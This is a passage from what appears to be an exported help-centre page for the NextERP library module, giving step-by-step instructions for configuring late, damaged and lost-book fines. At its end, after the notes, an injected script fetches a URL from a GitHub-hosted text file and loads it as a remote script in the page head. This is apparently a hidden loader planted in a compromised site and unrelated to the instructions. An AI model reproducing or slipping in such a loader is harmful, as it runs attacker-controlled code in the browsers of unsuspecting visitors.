It can be a fixed amount, slab amount or<\/span> <span style=\"font-weight: 400;\">a varying amount for each day. <\/span><span style=\"font-weight: 400;\">Remember that while more than one kind of lost fine or damaged fine can be created but not more than one kind of late fine( Fixed\/Slab Wise\/Per day) can be created in an academic session.<\/span><\/p>\n<ol>\n<li><span style=\"font-weight: 400;\">Click <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-84\" src=\"https:\/\/helpcenter.nexterp.in\/helpcenter\/wp-content\/uploads\/2019\/06\/Add.png\" alt=\"\" width=\"18\" height=\"18\" \/><\/span><span style=\"font-weight: 400;\"> at the top right corner of the screen to add fine.<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Click the<\/span><b> Late<\/b><span style=\"font-weight: 400;\"> icon at the left side of the page.<\/span><\/li>\n<li><span style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Select the method by which you want to calculate the late fine (Fixed, Slab wise or Per day).<br \/>\n<strong><br \/>\nFor Fixed Amount<br \/>\n<\/strong>Enter the <b>Fine Name<\/b>.<br \/>\nEnter the <b>Fine Amount.<br \/>\n<\/b><span style=\"text-decoration: underline;\"><strong>NOTE<\/strong><\/span>:<br \/>\nIf the late fine is created with a fixed amount, irrespective of the number of days by which the due date has crossed, the fixed amount can be charged.<\/p>\n<p><strong>For Slab Wise<br \/>\n<\/strong>Enter the <b>Fine Name<\/b>.<br \/>\nEnter the From Day and To Day to define the slab time.<br \/>\nEnter the <b>Slab amount<\/b>.<br \/>\nClick <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-377\" src=\"https:\/\/helpcenter.nexterp.in\/helpcenter\/wp-content\/uploads\/2019\/06\/image15.png\" alt=\"\" width=\"41\" height=\"44\" \/> at the right side to create more slabs.<br \/>\n<span style=\"text-decoration: underline;\"><strong>NOTE<\/strong><\/span>:<br \/>\n<\/span><\/span><span style=\"font-weight: 400;\">If the late fine is charged slab wise, different amounts can be charged for the specified time period.<br \/>\n<\/span><span style=\"font-weight: 400;\">E.g; Rs. 20 can be charged from the borrower who returns the holding any day between day 1 to day 5 after the due date and Rs. 40 can be charged from the borrower who returns the holding any day between day 6 to day 10 after the due date.<\/p>\n<p><strong>For Per Day<\/strong><br \/>\nEnter the <b>Fine Name<\/b>.<br \/>\nEnter the <b>Fine Amoun<\/b>t.<br \/>\nEnter the <b>Fine Limit<\/b> (Fine amount which can not be increased after fine limit).<br \/>\n<span style=\"text-decoration: underline;\"><strong>NOTE<\/strong><\/span>:<br \/>\nIf the late fine is charged per day, fine will be incremental each day.<br \/>\n<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Click <\/span><b>Save<\/b><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Click <\/span><b>Damaged<\/b><span style=\"font-weight: 400;\">\/<\/span><b>Lost<\/b><span style=\"font-weight: 400;\"> icon to create Damaged Fine \/Lost fine.<br \/>\n<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Select the method by which you wish to create the Fine.\n<p><strong>For Fixed amount<\/strong><br \/>\nEnter the <b>Fine Name.<\/b><br \/>\nEnter the <b>Fixed amount<\/b>.<\/p>\n<p><strong>For % of book Price<\/strong><br \/>\nEnter the <b>Fine Name<\/b>.<br \/>\nEnter Percentage of Book Price.<\/p>\n<p><\/span><\/li>\n<li><span style=\"font-weight: 400;\">Click <\/span><b>Save.<\/b><\/li>\n<\/ol>\n<p><span style=\"text-decoration: underline;\"><strong>NOTE<\/strong><\/span>:<\/p>\n<ul>\n<li><span style=\"font-weight: 400;\">Irrespective of the damage occurred to the book, the fixed amount will be charged as fine.<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Depending upon the damage happened for the holdings, various fines can be created.<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Default fine can be set for damaged and lost fine.<\/span><\/li>\n<\/ul>\n<p><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&gt; Library &gt; Library Fine Fine can be charged if the borrowed holding is not returned not returned in good condition not returned on time The lost fine can be charged if the holding is reported to have lost from the borrower.
